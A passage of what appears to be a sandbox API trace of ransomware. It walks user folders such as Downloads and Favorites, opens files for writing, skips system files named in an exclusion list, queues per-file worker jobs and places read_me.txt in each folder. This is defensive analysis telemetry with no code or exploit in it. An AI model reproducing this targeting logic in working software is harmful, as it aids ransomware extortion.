out: lpFindFileData=0x84afb60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0 [0076.085] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.085] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\read_me.txt") returned 69 [0076.085] GetProcessHeap () returned 0x4f10000 [0076.085] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0076.085] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 59 [0076.085] GetProcessHeap () returned 0x4f10000 [0076.085] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c50130 | out: hHeap=0x4f10000) returned 1 [0076.100] GetProcessHeap () returned 0x4f10000 [0076.100] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8e31128 [0076.102] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*") returned 45 [0076.113] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0076.113] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\.") returned 45 [0076.113] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.113] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\..") returned 46 [0076.113] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.113] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned 55 [0076.113] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8fc [0076.113] StrStrW (lpFirst="desktop.ini", lpSrch="read_me.txt") returned 0x0 [0076.113] StrStrW (lpFirst="desktop.ini", lpSrch="autoexec.bat") returned 0x0 [0076.113] StrStrW (lpFirst="desktop.ini", lpSrch="desktop.ini") returned="desktop.ini" [0076.114] CloseHandle (hObject=0x8fc) returned 1 [0076.114] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2499eee0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.114] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\read_me.txt") returned 55 [0076.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8fc [0076.114] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0076.114] CloseHandle (hObject=0x8fc) returned 1 [0076.114] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2499eee0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0076.114] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0076.114] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\read_me.txt") returned 55 [0076.114] GetProcessHeap () returned 0x4f10000 [0076.114] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8e31128 | out: hHeap=0x4f10000) returned 1 [0076.114] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 60 [0076.114] GetProcessHeap () returned 0x4f10000 [0076.114] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b700c0 | out: hHeap=0x4f10000) returned 1 [0076.114] GetProcessHeap () returned 0x4f10000 [0076.114] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8e31128 [0076.114] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*") returned 45 [0076.114] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24acf9e0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24acf9e0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0076.114] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\.") returned 45 [0076.115] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24acf9e0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24acf9e0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.115] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\..") returned 46 [0076.115] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.115] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned 55 [0076.115] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8fc [0076.115] StrStrW (lpFirst="desktop.ini", lpSrch="read_me.txt") returned 0x0 [0076.115] StrStrW (lpFirst="desktop.ini", lpSrch="autoexec.bat") returned 0x0 [0076.115] StrStrW (lpFirst="desktop.ini", lpSrch="desktop.ini") returned="desktop.ini" [0076.115] CloseHandle (hObject=0x8fc) returned 1 [0076.115] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x249c5040, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x249c5040, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0076.115] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned 49 [0076.115] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24a37460, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24a37460, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0076.115] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned 62 [0076.115] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24acf9e0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24acf9e0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0076.115] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned 56 [0076.115] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24acf9e0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24acf9e0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24acf9e0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.115] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\read_me.txt") returned 55 [0076.115] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8fc [0076.115] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0076.115] CloseHandle (hObject=0x8fc) returned 1 [0076.115] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0076.116] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned 56 [0076.116] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0076.116] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0076.116] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\read_me.txt") returned 55 [0076.116] GetProcessHeap () returned 0x4f10000 [0076.116] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8e31128 | out: hHeap=0x4f10000) returned 1 [0076.116] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 61 [0076.116] GetProcessHeap () returned 0x4f10000 [0076.116] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c60138 | out: hHeap=0x4f10000) returned 1 [0076.116] GetProcessHeap () returned 0x4f10000 [0076.116] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8e31128 [0076.116] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*") returned 51 [0076.116] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x249c5040, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x249c5040, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0076.116] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\.") returned 51 [0076.116] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x249c5040, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x249c5040, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.116] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\..") returned 52 [0076.117] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.117] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini") returned 61 [0076.117] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8fc [0076.117] StrStrW (lpFirst="desktop.ini", lpSrch="read_me.txt") returned 0x0 [0076.117] StrStrW (lpFirst="desktop.ini", lpSrch="autoexec.bat") returned 0x0 [0076.117] StrStrW (lpFirst="desktop.ini", lpSrch="desktop.ini") returned="desktop.ini" [0076.117] CloseHandle (hObject=0x8fc) returned 1 [0076.117] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x249c5040, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x249c5040, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x249c5040, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.117] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\read_me.txt") returned 61 [0076.117] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8fc [0076.117] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0076.117] CloseHandle (hObject=0x8fc) returned 1 [0076.117] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 1 [0076.118] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned 69 [0076.118] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x910 [0076.126] StrStrW (lpFirst="suggested sites.url", lpSrch="read_me.txt") returned 0x0 [0076.126] StrStrW (lpFirst="suggested sites.url", lpSrch="autoexec.bat") returned 0x0 [0076.126] StrStrW (lpFirst="suggested sites.url", lpSrch="desktop.ini") returned 0x0 [0076.126] StrStrW (lpFirst="suggested sites.url", lpSrch="autorun.inf") returned 0x0 [0076.126] StrStrW (lpFirst="suggested sites.url", lpSrch="ntuser.dat") returned 0x0 [0076.126] StrStrW (lpFirst="suggested sites.url", lpSrch="iconcache.db") returned 0x0 [0076.126] StrStrW (lpFirst="suggested sites.url", lpSrch="bootsect.bak") returned 0x0 [0076.126] StrStrW (lpFirst="suggested sites.url", lpSrch="boot.ini") returned 0x0 [0076.126] StrStrW (lpFirst="suggested sites.url", lpSrch="ntuser.dat.log") returned 0x0 [0076.126] StrStrW (lpFirst="suggested sites.url", lpSrch="thumbs.db") returned 0x0 [0076.126] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 100 [0076.126] QueueUserWorkItem (Function=0x404e00, Context=0x910, Flags=0x0) returned 1 [0076.126] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0076.126] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned 71 [0076.127] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x914 [0076.127] StrStrW (lpFirst="web slice gallery.url", lpSrch="read_me.txt") returned 0x0 [0076.127] StrStrW (lpFirst="web slice gallery.url", lpSrch="autoexec.bat") returned 0x0 [0076.127] StrStrW (lpFirst="web slice gallery.url", lpSrch="desktop.ini") returned 0x0 [0076.127] StrStrW (lpFirst="web slice gallery.url", lpSrch="autorun.inf") returned 0x0 [0076.127] StrStrW (lpFirst="web slice gallery.url", lpSrch="ntuser.dat") returned 0x0 [0076.127] StrStrW (lpFirst="web slice gallery.url", lpSrch="iconcache.db") returned 0x0 [0076.127] StrStrW (lpFirst="web slice gallery.url", lpSrch="bootsect.bak") returned 0x0 [0076.127] StrStrW (lpFirst="web slice gallery.url", lpSrch="boot.ini") returned 0x0 [0076.127] StrStrW (lpFirst="web slice gallery.url", lpSrch="ntuser.dat.log") returned 0x0 [0076.127] StrStrW (lpFirst="web slice gallery.url", lpSrch="thumbs.db") returned 0x0 [0076.127] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 101 [0076.127] QueueUserWorkItem (Function=0x404e00, Context=0x914, Flags=0x0) returned 1 [0076.127] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="web slice gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0076.127] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0076.127] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\read_me.txt") returned 61 [0076.127] GetProcessHeap () returned 0x4f10000 [0076.127] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8e31128 | out: hHeap=0x4f10000) returned 1 [0076.127] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 62 [0076.127] GetProcessHeap () returned 0x4f10000 [0076.127] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c91058 | out: hHeap=0x4f10000) returned 1 [0076.145] GetProcessHeap () returned 0x4f10000 [0076.145] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b600b8 [0076.145] wnsprintfW (in: pszDest=0x8b600b8, cchDest=32767, pszFmt="%s\\*" 